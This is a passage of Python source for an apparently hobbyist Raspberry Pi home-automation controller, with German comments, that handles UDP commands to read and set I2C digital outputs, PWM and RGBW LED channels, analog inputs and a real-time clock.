elif GeCoSInData==\"SPWM\":\n pwmAll()\n elif GeCoSInData==\"SRGBW\":\n rgbwAll()\n elif GeCoSInData==\"SAO\":\n ReadOutAll()\n elif GeCoSInData==\"RRTC\":\n read_rtc()\n #RTC lesen\n elif len(GeCoSInData)>=7: #13\n arr=GeCoSInData.split(\";\")\n if arr[0]==\"SOM\":\n set_output(arr)\n elif arr[0]==\"PWM\":\n set_pwm(arr)\n elif arr[0]==\"RGBW\":\n set_rgbw(arr)\n elif arr[0]==\"SAM\":\n read_analog(arr)\n elif arr[0]==\"SRTC\":\n #RTC Setzen\n set_rtc(arr)\n else:\n GeCoSInData.replace(\"{\",\"\")\n GeCoSInData.replace(\"}\",\"\")\n sendUDP(\"{0}ERR;{1}Befehl nicht erkannt{2}\".format(\"{\",GeCoSInData,\"}\"))\n log(\"Befehl nicht erkannt: {0}\".format(GeCoSInData),\"ERROR\")\n else:\n GeCoSInData.replace(\"{\",\"\")\n GeCoSInData.replace(\"}\",\"\")\n sendUDP(\"{0}ERR;{1}Befehl nicht erkannt{2}\".format(\"{\",GeCoSInData,\"}\"))\n log(\"Befehl nicht erkannt: {0}\".format(GeCoSInData),\"ERROR\")\n else:\n arr=\"\"\n statusI2C=1\n #Verbindung unterbrochen, Neue Verbindung akzeptieren:\n if conClosed==True:\n log(\"Verbindung getrennt!\",\"ERROR\")\n thread_gecosOut()\n break\n else:\n sendUDP(\"{0}{1}Befehl nicht erkannt{2}\".format(\"{\",GeCoSInData,\"}\"))\n log(\"Befehl nicht erkannt: {0}\".format(GeCoSInData),\"ERROR\")\n\ndef thread_gecosOut():\n _thread.start_new_thread(getUDP,())\n\ndef thread_interrupt(pin):\n _thread.start_new_thread(interrutpKanal,(pin,))\n\ndef read_output(kanal,adresse):\n global statusI2C\n if adresse <0x24 or adresse > 0x27:\n log(\"Modul adresse ungueltig: {0}\".format(adresse))\n sArr=\"{\"\n sArr+=\"SAO;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\")\n sArr=\"{\"\n sArr+=\"SAO;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n\n sArr=\"{\"\n sArr+=\"SAO;{0};{1};\".format(kanal,hex(adresse))\n try:\n if _check_i2c() == False:\n return \n \n statusI2C=0\n #Bytes fuer Bank A + B auslesen\n plexer.channel(mux,kanal) \n iOutA=plexer.bus.read_byte_data(adresse,bankA)\n iOutB=plexer.bus.read_byte_data(adresse,bankB)\n iOut = [iOutB, iOutA]\n i=int.from_bytes(iOut,\"big\")\n sArr+=\"{0};\".format(i)\n sStatus=\"OK\" \n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n log(\"I/O error: 
{0}\".format(err),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler Output lesen\"\n log(\"Fehler Output lesen: {0}\".format(sArr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\"{0}}}\".format(sStatus)\n sendUDP(sArr)\n\ndef set_output(arr):\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n if adresse <0x24 or adresse > 0x27:\n log(\"Modul adresse ungueltig: {0}\".format(adresse))\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n try:\n if _check_i2c() == False:\n return \n statusI2C=0\n #Bytes fuer Bank A + B auslesen\n plexer.channel(mux,kanal) \n iOutA=plexer.bus.read_byte_data(adresse,bankA)\n iOutB=plexer.bus.read_byte_data(adresse,bankB)\n tmpArrOut=int(arr[3]).to_bytes(2,\"big\")\n iOutA=tmpArrOut[1]\n iOutB=tmpArrOut[0]\n plexer.channel(mux,kanal)\n plexer.bus.write_byte_data(adresse,bankA,iOutA)\n plexer.bus.write_byte_data(adresse,bankB,iOutB)\n #Prüfen und antworten.\n iOutA=plexer.bus.read_byte_data(adresse,bankA)\n iOutB=plexer.bus.read_byte_data(adresse,bankB)\n sStatus=\"OK\" \n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n log(\"I/O error: {0}\".format(err),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler Output lesen\"\n log(\"Fehler Output: {0}\".format(arr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\";{0}}}\".format(sStatus)\n sArr = sArr.replace(\";;\",\";\")\n sendUDP(sArr) \n \ndef log(message, level=\"INFO\"):\n timestamp= time.strftime(\"%d.%m.%Y %H:%M:%S\", time.localtime(time.time()))\n print(\"{0} {1}: {2}\".format(timestamp, level, message))\n if level==\"ERROR\":\n file = open(\"/home/pi/logfile.log\",\"a\")\n file.write(\"%s: %s\\n\" % (time.strftime(\"%d.%m.%Y %H:%M:%S\"), message))\n file.close\n\n \ndef set_bit(v, index, x): #v=original wert, x= true oder false\n #Bit auf 1/0 setzen (True oder False)\n mask = 1<< index\n v&=~mask\n if x:\n v |= mask\n return v\n \ndef ReadOutAll():\n global statusI2C\n global aOut0\n for kanal in range(3):\n if kanal==0:\n for device in aOut0:\n try:\n read_output(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==1:\n for device in aOut1:\n try:\n read_output(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==2:\n for device in aOut2:\n try:\n read_output(kanal,device)\n except:\n statusI2C=1\n pass\n \n\ndef pwmAll():\n global statusI2C,aPWM0,aPWM1,aPWM2\n for kanal in range(3):\n if kanal==0:\n for device in aPWM0:\n try:\n read_pwm(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==1:\n for device in aPWM1:\n try:\n read_pwm(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==2:\n for device in aPWM2:\n try:\n read_pwm(kanal,device)\n except:\n statusI2C=1\n pass\n\n\ndef rgbwAll():\n global statusI2C,aRGBW0,aRGBW1,aRGBW2\n for kanal in range(3):\n if kanal==0:\n for device in aRGBW0:\n try:\n read_rgbw(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==1:\n for device in aRGBW1:\n try:\n read_rgbw(kanal,device)\n except:\n statusI2C=1\n pass\n if kanal==2:\n for device in aRGBW2:\n try:\n read_rgbw(kanal,device)\n except:\n statusI2C=1\n pass \n\ndef interrutpKanal(pin):\n global statusI2C\n #Kanal nach INT Pin Wählen:\n if pin==intKanal0:\n 
kanal=0\n for device in aIN0:\n try:\n read_input(kanal,device,1)\n except:\n statusI2C=1\n pass \n elif pin==intKanal1:\n kanal=1\n for device in aIN1:\n try:\n read_input(kanal,device,1)\n except:\n statusI2C=1\n pass\n elif pin==intKanal2:\n kanal=2\n for device in aIN2:\n try:\n read_input(kanal,device,1)\n except:\n statusI2C=1\n pass\n else:\n log(\"Kanal ungültig\",\"ERROR\")\n kanal=0\n\ndef read_rtc():\n global statusI2C\n if _check_i2c() == False:\n return\n\n try:\n statusI2C=0\n plexer.channel(mux,3)\n rtctime = ds.read_datetime()\n sArr=\"{RRTC;\"\n sArr+= rtctime.strftime(\"%d;%m;%Y;%H;%M;%S;\")\n sArr+= \"{0};\".format(ds.read_temp())\n sArr+=\"OK}\"\n sendUDP(sArr)\n statusI2C=1\n except: \n statusI2C=1\n sArr=\"{RRTC;\"\n sArr+=\"Fehler RTC lesen}\"\n sendUDP(sArr) \n log(\"Error RTC lesen\",\"ERROR\") \n\n\ndef set_rtc(arr):\n global statusI2C\n if _check_i2c() == False:\n return\n try:\n statusI2C=0\n str_dto= \"{0}/{1}/{2} {3}:{4}:{5}\".format(arr[2],arr[1],arr[3],arr[4],arr[5],arr[6])\n dto = datetime.strptime(str(str_dto), '%m/%d/%Y %H:%M:%S')\n plexer.channel(mux,3)\n ds.write_datetime(dto)\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";OK}\"\n sendUDP(sArr) \n statusI2C=1\n except: \n statusI2C=1\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Fehler RTC setzen}\"\n sendUDP(sArr) \n log(\"Error RTC setzen\",\"ERROR\") \n \n\ndef read_analog(arr):\n # \"SAM\";I2C Kanal;Adresse;Channel-Analog;Resolution;Amplifier\n # {SAM;0;0x69;AnalogChannel;Resolution;Amplifier}\n # {SAM;0;0x69;0;3;0}\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n channel=int(arr[3])\n res=int(arr[4])\n amp=int(arr[5])\n if adresse <0x68 or adresse > 0x6B:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n \n if channel <0 or channel > 3:\n log(\"Analog Channel ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Channel ungueltig}\"\n sendUDP(sArr) \n return\n if res <0 or res > 3:\n log(\"Analog Resolution ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Resolution ungueltig}\"\n sendUDP(sArr) \n return\n if amp <0 or amp > 3:\n log(\"Analog Amplifier ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Amplifier ungueltig}\"\n sendUDP(sArr) \n return\n \n if _check_i2c() == False:\n return\n \n statusI2C=0\n plexer.channel(mux,kanal)\n #Config Bits bit5+6 = Channel\n # Bit 4 4Converison Mode = 1\n # Bits 3+2 Resolution\n # Bist 0+1 = Amplifier\n #arr[3] = Resolution \n #arr[4] = Amplifier\n bconfig=b\"0\"\n bconfig = channel <<5 | 1 <<4 | res <<2 | amp\n plexer.bus.write_byte(adresse,bconfig)\n #Warten bis ergebnis:\n #I2C Port Freigeben:\n statusI2C=1\n if res==0:\n time.sleep(0.010)\n elif res==1:\n time.sleep(0.022)\n elif res==2:\n time.sleep(0.080)\n else:\n time.sleep(0.300)\n if _check_i2c() == False:\n return\n statusI2C=0\n #Je Nach Auflösung 3 oder 4Byte lesen:\n #res=3 dann 4 sonst 3\n readyBit=0\n if res==3:\n erg=plexer.bus.read_i2c_block_data(adresse,bconfig,4)\n readyBit=bit_from_string(erg[3],8)\n else:\n erg=plexer.bus.read_i2c_block_data(adresse,bconfig,3)\n readyBit=bit_from_string(erg[2],8)\n\n signBit=0\n if readyBit==0:\n if res==0:\n #12bit\n wert = ((erg[0] & 0b00001111) <<8 | erg[1])\n 
signBit=bit_from_string(wert,11)\n if signBit:\n wert = set_bit(wert,11,0)\n wert=wert*0.004923\n if signBit:\n wert=wert-2048\n \n\n elif res==1:\n #14bit\n wert = ((erg[0] & 0b00111111) <<8 | erg[1])\n signBit=bit_from_string(wert,13)\n if signBit:\n wert = set_bit(wert,13,0)\n wert=wert*0.00123075\n if signBit:\n wert=wert-2048\n\n elif res==2:\n #16bit\n wert = (erg[0] <<8 | erg[1])\n signBit=bit_from_string(wert,15)\n if signBit:\n wert = set_bit(wert,15,0)\n wert=wert*0.0003076875\n if signBit:\n wert=wert-2048\n else:\n #18bit\n wert = ((erg[0] & 0b00000011) <<16 | erg[1]<<8 | erg[2])\n signBit=bit_from_string(wert,17)\n if signBit:\n wert = set_bit(wert,17,0)\n wert=wert*0.000076921875\n if signBit:\n wert=wert-2048\n #print(\"Wert:\",wert)\n sStatus=\"OK\"\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";{0};{1}{2}\".format(round(wert,3),sStatus,\"}\")\n sendUDP(sArr) \n else:\n log(\"Analog: Daten nicht bereit...\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Analog Daten nicht bereit}\"\n sendUDP(sArr) \n return\n statusI2C=1\n\ndef read_pwm(kanal, adresse):\n global statusI2C\n if adresse <0x50 or adresse > 0x57:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\"SPWM;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\"SPWM;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n \n if _check_i2c() == False:\n return\n \n statusI2C=0\n plexer.channel(mux,kanal)\n #{PWM;I2C-Kanal;Adresse;Kanal;Wert}\n #befehl=\"{0};{1};\".format(kanal,hex(adresse))\n for i in range(16): #16\n sArr=\"{\"\n sArr+=\"SPWM;{0};{1};{2};\".format(kanal,hex(adresse),i)\n startAdr=int(i*4+6)\n #LowByte\n lByte=plexer.bus.read_byte_data(adresse,startAdr+2)\n #HighByte\n hByte=plexer.bus.read_byte_data(adresse,startAdr+3)\n tmpByte=0\n tmpByte=(hByte >> 4) & 0b0000001\n wert=0\n wert = wert*256+int(hByte& 0b0001111)\n wert = wert*256+int(lByte)\n if wert==0:\n wert=0\n else:\n wert=wert\n #PWM Status\n if tmpByte==0:\n sArr+= \"1;\"\n else:\n sArr+= \"0;\"\n #PWM Wert:\n sArr+= str(wert)+\";\"\n sArr+=\"OK}\"\n sendUDP(sArr)\n statusI2C=1\n\ndef read_rgbw(kanal, adresse):\n global statusI2C\n if adresse <0x57 or adresse > 0x5f:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAP;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAP;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n \n if _check_i2c() == False:\n return\n \n statusI2C=0\n plexer.channel(mux,kanal)\n #{RGBW;I2C-Kanal;Adresse;RGBWKanal;StatusRGB;StatusW;R;G;B;W}\n #befehl=\"{0};{1};\".format(kanal,hex(adresse))\n i2 = 0\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n hByteW=0\n hByteR=0\n r=0\n g=0\n b=0\n w=0\n i3=0\n print(\"test\")\n for i in range(16): #16\n startAdr=int(i*4+6)\n #LowByte\n lByte=plexer.bus.read_byte_data(adresse,startAdr+2)\n #HighByte\n hByte=plexer.bus.read_byte_data(adresse,startAdr+3)\n wert=0\n wert = wert*256+int(hByte& 0b0001111)\n wert = wert*256+int(lByte)\n if i3==0:\n r=wert\n hByteR=hByte\n elif i3==1:\n g=wert\n elif i3==2:\n b=wert\n elif i3==3:\n w=wert\n hByteW=hByte\n\n # 
sArr+= str(wert)+\";\"\n if i2==0:\n if i == i2+3:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==0:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==0:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}}\".format(iSR,iSW,r,g,b,w) #'}}' emits one literal '}' in str.format\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n if i2==1:\n if i == i2+6:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==1:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==1:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}}\".format(iSR,iSW,r,g,b,w)\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n if i2==2:\n if i== i2+9:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==1:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==1:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}}\".format(iSR,iSW,r,g,b,w)\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n if i==15:\n i2+=1\n #PWM Status W\n iSW=0\n tmpByte=(hByteW >> 4) & 0b0000001\n if tmpByte==1:\n iSW=1\n else:\n iSW=0\n #PWM Status R\n iSR=0\n tmpByte=(hByteR >> 4) & 0b0000001\n if tmpByte==1:\n iSR=1\n else:\n iSR=0\n sArr+=\"{0};{1};{2};{3};{4};{5};OK}}\".format(iSR,iSW,r,g,b,w)\n sendUDP(sArr)\n sArr=\"{\"\n sArr+=\"SRGBW;{0};{1};{2};\".format(kanal,hex(adresse),i2)\n r=0\n g=0\n b=0\n w=0\n statusI2C=1\n\ndef set_pwm(arr):\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n if adresse <0x50 or adresse > 0x57:\n log(\"Modul Adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul Adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[3]) < 0 or int(arr[3]) >15:\n log(\"PWM-Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[4]) <0 or int(arr[4]) >1:\n log(\"PWM-Status ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Status ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[5]) <0 or int(arr[5]) >4095:\n log(\"PWM-Wert ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Wert ungueltig}\"\n sendUDP(sArr) \n return\n sStatus=\"\"\n try:\n if _check_i2c() == False:\n return\n statusI2C=0\n plexer.channel(mux,kanal)\n #LED_ON Immer 0\n #LED_OFF 4096*X%-1\n #Array durchlaufen 0-15 (+1) = ausgang; ausgang*4+6 = Start Adresse LED_ON_L \n #Array 3= Kanal 4 = wert\n i=int(arr[3])\n wert = int(arr[5]) #int(round(4095*(int(arr[5])/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n statusI2C=1\n sStatus=\"OK\"\n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n log(\"I/O error: {0}\".format(err),\"ERROR\")\n except:\n statusI2C=1\n 
sStatus=\"Fehler PWM Setzen lesen\"\n log(\"Fehler PWM Setzen: {0}\".format(arr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\";{0}}}\".format(sStatus)\n sArr = sArr.replace(\";;\",\";\")\n sendUDP(sArr)\n\ndef set_rgbw(arr):\n global statusI2C\n adresse=int(arr[2],16)\n kanal=int(arr[1])\n if adresse <0x58 or adresse > 0x5f:\n log(\"Modul Adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Modul Adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[3]) <0 or int(arr[3]) >3:\n log(\"PWMKanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";PWM-Kanal ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[4]) <0 or int(arr[4]) >1:\n log(\"StatusRGB ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";StatusRGB ungueltig}\"\n sendUDP(sArr) \n return\n if int(arr[5]) <0 or int(arr[5]) >1:\n log(\"StatusW ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sArr+=\";StatusW ungueltig}\"\n sendUDP(sArr) \n return\n sStatus=\"\"\n try:\n if _check_i2c() == False:\n return\n statusI2C=0\n plexer.channel(mux,kanal)\n #LED_ON Immer 0\n #LED_OFF 4096*X%-1\n #Array durchlaufen 0-15 (+1) = ausgang; ausgang*4+6 = Start Adresse LED_ON_L \n #Array 3= Kanal 4 = wert\n i=int(arr[3])\n if i==1:\n i+=3\n elif i==2:\n i+=6\n elif i==3:\n i+=9\n r=int(arr[6])\n g=int(arr[7])\n b=int(arr[8])\n w=int(arr[9])\n #Rot:\n wert = r #int(round(4095*(r/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n i+=1\n #Grün:\n wert = g #int(round(4095*(g/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n i+=1\n #Blau:\n wert = b #int(round(4095*(b/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[4])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n i+=1\n #Weiß:\n wert = w #int(round(4095*(w/100)))\n startAdr=int(i*4+6)\n hByte, lByte = bytes(divmod(wert,0x100))\n #Status Ein/Aus:\n if(int(arr[5])==1):\n hByte=set_bit(hByte,4,False)\n else:\n hByte=set_bit(hByte,4,True)\n plexer.bus.write_byte_data(adresse,startAdr,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+1,0x00)\n plexer.bus.write_byte_data(adresse,startAdr+2,lByte)\n plexer.bus.write_byte_data(adresse,startAdr+3,hByte)\n statusI2C=1\n sStatus=\"OK\"\n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n 
log(\"I/O error: {0}\".format(str(err)),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler PWM Setzen lesen\"\n log(\"Fehler PWM Setzen: {0}\".format(arr),\"ERROR\")\n finally:\n statusI2C=1\n if len(sStatus) < 1:\n sStatus=\"Unkown Error\"\n sArr=\"{\"\n sArr+=\";\".join(arr)\n sStatus=sStatus.replace(\";\",\"\")\n sArr+=\";{0}}}\".format(sStatus)\n sArr = sArr.replace(\";;\",\";\")\n sendUDP(sArr) \n \ndef read_input(kanal,adresse, manual=0):\n global statusI2C,statIN0,statIN1,statIN2\n if adresse <0x20 or adresse > 0x23:\n log(\"Modul adresse ungueltig: {0}\".format(adresse),\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAI;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\"Modul adresse ungueltig}\"\n sendUDP(sArr) \n return\n \n if kanal <0 or kanal > 3:\n log(\"Kanal ungueltig\",\"ERROR\")\n sArr=\"{\"\n sArr+=\"SAI;{0};{1};\".format(kanal,hex(adresse))\n sArr+=\"Kanal ungueltig}\"\n sendUDP(sArr) \n return\n\n # Programm in Schleife -> Auf änderung prüfen -> bei Änderung senden + Neuen Status in Variable schreiben\n # Kanal-> Auswahl statIN0-2\n # Adresse 0x20-0x23 -> Value 0&1 / 2&3 / 4&5 / 6&7\n # Erster Value - Bank A, Zweiter = Bank B\n # wertAltA=statIN0[0]\n # wertAltB=statIN0[1]\n wertAltA=0\n wertAltB=0\n if kanal==0:\n if adresse==0x20:\n wertAltA=statIN0[0]\n wertAltB=statIN0[1]\n if adresse==0x21:\n wertAltA=statIN0[2]\n wertAltB=statIN0[3]\n if adresse==0x22:\n wertAltA=statIN0[4]\n wertAltB=statIN0[5]\n if adresse==0x23:\n wertAltA=statIN0[6]\n wertAltB=statIN0[7]\n\n if kanal==1:\n if adresse==0x20:\n wertAltA=statIN1[0]\n wertAltB=statIN1[1]\n if adresse==0x21:\n wertAltA=statIN1[2]\n wertAltB=statIN1[3]\n if adresse==0x22:\n wertAltA=statIN1[4]\n wertAltB=statIN1[5]\n if adresse==0x23:\n wertAltA=statIN1[6]\n wertAltB=statIN1[7]\n\n if kanal==2:\n if adresse==0x20:\n wertAltA=statIN2[0]\n wertAltB=statIN2[1]\n if adresse==0x21:\n wertAltA=statIN2[2]\n wertAltB=statIN2[3]\n if adresse==0x22:\n wertAltA=statIN2[4]\n wertAltB=statIN2[5]\n if adresse==0x23:\n wertAltA=statIN2[6]\n wertAltB=statIN2[7]\n try:\n if _check_i2c() == False:\n print(\"i2c belegt\")\n return\n statusI2C=0\n time.sleep(0.001)\n plexer.channel(mux,kanal)\n #GPIO A+B Lesen und String bauen:\n wertA=plexer.bus.read_byte_data(adresse,gpioA)\n wertB=plexer.bus.read_byte_data(adresse,gpioB)\n if wertAltA!=wertA or wertAltB!=wertB or manual==1:\n #print(\"Unterschied, Senden!\")\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n iIn = [wertB, wertA]\n i=int.from_bytes(iIn,\"big\")\n befehl+=\"{0};\".format(i)\n befehl+=\"OK}\"\n sendUDP(befehl)\n\n #erneut lesen, auf änderung prüfen:\n wertA2=plexer.bus.read_byte_data(adresse,gpioA)\n wertB2=plexer.bus.read_byte_data(adresse,gpioB)\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n if wertA2!=wertA or wertB2!=wertB:\n iIn = [wertB2, wertA2]\n i=int.from_bytes(iIn,\"big\")\n befehl+=\"{0};\".format(i)\n befehl+=\"OK}\"\n sendUDP(befehl)\n wertA=wertA2\n wertB=wertB2 \n statusI2C=1\n except OSError as err:\n statusI2C=1\n sStatus=str(err)\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n befehl+=\"IO Error Input lesen\"\n befehl+=\"{0}}}\".format(sStatus)\n sendUDP(befehl)\n log(\"I/O error: {0}\".format(str(err)),\"ERROR\")\n except:\n statusI2C=1\n sStatus=\"Fehler Input lesen.\"\n befehl=\"{SAI;\"\n befehl+=\"{0};{1};\".format(kanal,hex(adresse))\n befehl+=\"Fehler Input lesen\"\n befehl+=\"{0}}}\".format(sStatus)\n sendUDP(befehl)\n log(\"Fehler Input lesen: {0}\".format(befehl),\"ERROR\")\n finally:\n 
